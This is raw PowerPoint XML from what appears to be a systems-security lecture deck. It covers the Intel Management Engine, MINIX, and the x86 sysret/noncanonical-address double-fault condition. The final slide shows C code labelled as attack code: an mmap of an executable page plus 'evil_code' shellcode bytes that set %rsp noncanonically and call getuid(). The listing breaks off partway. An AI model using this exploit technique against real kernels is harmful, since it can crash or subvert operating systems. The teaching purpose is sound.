            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="253462" y="468450"/>
              <a:ext cx="11685076" cy="5593439"/>
              <a:chOff x="217170" y="1017269"/>
              <a:chExt cx="11795760" cy="5646421"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="Picture 2" descr="Image result for intel management engine">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{227905B2-8706-417C-8DF7-57E1F70529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82" t="2268" r="1469" b="2809"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="217170" y="1017269"/>
                <a:ext cx="11795760" cy="564642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02DB6963-1A0D-44BA-A70F-D06B46EA0941}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8704945" y="3943221"/>
                <a:ext cx="1493004" cy="229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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>MINIX Kernel</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22074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3EAC-87E6-471E-91E1-2098776D8FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="40272"/>
            <a:ext cx="10515600" cy="862096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Double-Fault Will Occur!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A4AE1A-8CDB-4A33-931E-3746C24CD3F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="806116"/>
            <a:ext cx="10515600" cy="1473201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A double fault is a fatal condition which occurs when hardware is trying to handle an exception, and another exception is triggered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only certain pairs of exceptions will cause a double fault</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438FB5E7-A4F7-4333-9930-B342944C5873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2165939" y="2243221"/>
            <a:ext cx="9953625" cy="4333875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEA7F52-0658-4559-8A49-94A3C51D33CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2743765"/>
            <a:ext cx="5089358" cy="1822887"/>
            <a:chOff x="0" y="2743765"/>
            <a:chExt cx="5089358" cy="1822887"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09BF02BC-614D-4036-8F55-510D5A810676}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2219218" y="4199021"/>
              <a:ext cx="2870140" cy="36763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A4E092B-4C51-4D8D-8FE5-07F634884354}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1005500" y="4382837"/>
              <a:ext cx="118453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6E769E-0447-483D-BD40-F2B59581F1BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2743765"/>
              <a:ext cx="2358189" cy="1569660"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Fault 1: Caused by </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>sysret</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> finding a noncanonical </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>rcx</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:ln w="3175">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27CAC7AF-BCF6-4C81-91A7-7EA8CE3EC8E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="741947" y="4114132"/>
              <a:ext cx="285469" cy="0"/>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FA01A8-0842-43EB-BA4B-B054CDC6623B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="998621" y="4086288"/>
              <a:ext cx="0" cy="331150"/>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AA35280-4040-4F40-85DC-012A4ECF31A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="3674976"/>
            <a:ext cx="9515315" cy="3177061"/>
            <a:chOff x="0" y="3674976"/>
            <a:chExt cx="9515315" cy="3177061"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D558CFD2-17DB-4ADF-9B1A-A52E7B904635}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="4543713"/>
              <a:ext cx="2251725" cy="2308324"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Fault 2: Caused by hardware responding to </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>#GP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> and finding a noncanonical </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                  <a:ln w="3175">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>rsp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:ln w="3175">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8E1B879-8BE2-458C-876B-0479DC044C01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7209454" y="3674976"/>
              <a:ext cx="2305861" cy="36763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C61F6BDD-6724-4E0B-96B1-A789F1D9BA4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6436895" y="3846759"/>
              <a:ext cx="72535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8D5E6CD-19F3-46FE-92CC-1EAC1CA3CF49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="764774" y="6626384"/>
              <a:ext cx="5781191" cy="0"/>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836A7A6-F8B8-49ED-9A98-0C6B932D3CE7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6476739" y="3846759"/>
              <a:ext cx="28574" cy="2779625"/>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01642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3EAC-87E6-471E-91E1-2098776D8FEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="40272"/>
            <a:ext cx="10515600" cy="862096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Double-Fault Will Occur!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C718B4F-6979-4F38-9E79-97BE3ECBE60D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947611" y="1419726"/>
            <a:ext cx="6172200" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“A program-state following a double-fault exception is undefined. The program or task cannot be resumed or restarted. The only available action of the double-fault exception handler is to collect all possible context information for use in diagnostics and then close the application and/or shut down or reset the processor.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC8BAFD-3A32-43FA-9623-405EF90836EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940962" y="1397079"/>
            <a:ext cx="0" cy="432888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66B9D9F-F887-43ED-95C9-371576070584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="120317" y="1179096"/>
            <a:ext cx="5645531" cy="5662696"/>
            <a:chOff x="120317" y="1179096"/>
            <a:chExt cx="5645531" cy="5662696"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D4713E-92A1-4440-B385-7B0E0F03299C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="120317" y="1751505"/>
              <a:ext cx="5502227" cy="3915538"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B6371CB-24B7-40A4-8192-889918F23571}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="120317" y="1179096"/>
              <a:ext cx="5645531" cy="56626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798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4D1808-B9E1-4D34-A19C-F8B459A35C4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="312820" y="289334"/>
            <a:ext cx="11790947" cy="10074930"/>
            <a:chOff x="312820" y="289334"/>
            <a:chExt cx="11790947" cy="10074930"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D503418E-93F8-4764-AC72-0A8982A14D09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312820" y="1130967"/>
              <a:ext cx="11790947" cy="9233297"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// Allocate a memory page at the upper end of low</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// canonical memory.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uint64_t </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>page_size</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = 4096;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uint8_t* page = (uint8_t*)((1ULL &lt;&lt; 47) - </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>page_size</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>page = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mmap</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(page, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>page_size</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    PROT_READ | PROT_WRITE | PROT_EXEC,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// Define the attack code: set %</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rsp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> to a noncanonical</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// value, then invoke the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>getuid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>() system call (whose</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>syscall_num</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> is 24).</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>char </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[] =</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    "\x48\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xBC</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\x08\x00\x00\x00\x00\x80\x00\x00" // mov 0x800000000008, %</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rsp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    "\xb8\x18\x00\x00\x00"                     // mov 24, %</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rax</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0">
